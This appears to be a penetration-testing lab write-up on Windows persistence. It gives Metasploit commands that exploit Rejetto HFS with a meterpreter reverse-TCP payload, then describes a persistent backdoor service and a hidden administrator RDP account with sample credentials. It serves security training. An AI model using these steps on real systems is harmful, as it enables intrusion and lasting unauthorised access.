🔬Windows Persistence

Lab 1 - Service

🔬 Maintaining Access: Persistence Service

• Target IP: 10.2.20.244

• Persistence via services

nmap -sV 10.2.20.244

80/tcp    open  http 		 HttpFileServer httpd 2.3
135/tcp   open  msrpc		 Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc 		 Microsoft Windows RPC
49153/tcp open  msrpc 		 Microsoft Windows RPC
49154/tcp open  msrpc 		 Microsoft Windows RPC
49155/tcp open  msrpc 		 Microsoft Windows RPC
49156/tcp open  msrpc 		 Microsoft Windows RPC

Exploitation

service postgresql start && msfconsole -q

search rejetto
use exploit/windows/http/rejetto_hfs_exec
options
setg RHOSTS 10.2.20.244
set payload windows/x64/meterpreter/reverse_tcp
run

• With the Administrator Meterpreter session, privilege escalation is not necessary.

Persistence

❗ In order to set up persistence, administrative privileges are required.

• Successful maintained access. Once the persistent backdoor is installed, it's going to continue to run (across restarts) as a service and a multi handler listening to a connection will receive a connection from the service.

• Kill all MSF sessions

• Regain access to the system

Lab 2 - RDP

🔬 Maintaining Access: RDP

• Target IP: 10.2.20.249

• Persistence via RDP and a backdoor user account

Exploitation

Enable RDP & New User

• Use the getgui Meterpreter command to

  • Enable the RDP service

  • Create a new user & hide it from Win Login screen

  • Add it to Remote Desktop Users & Administrators groups

📌 New user's credentials are newuser:attack_1234321

• In a new Terminal TAB

• The cleanup script provided to remove the added account can be run when the attacker is done with the current system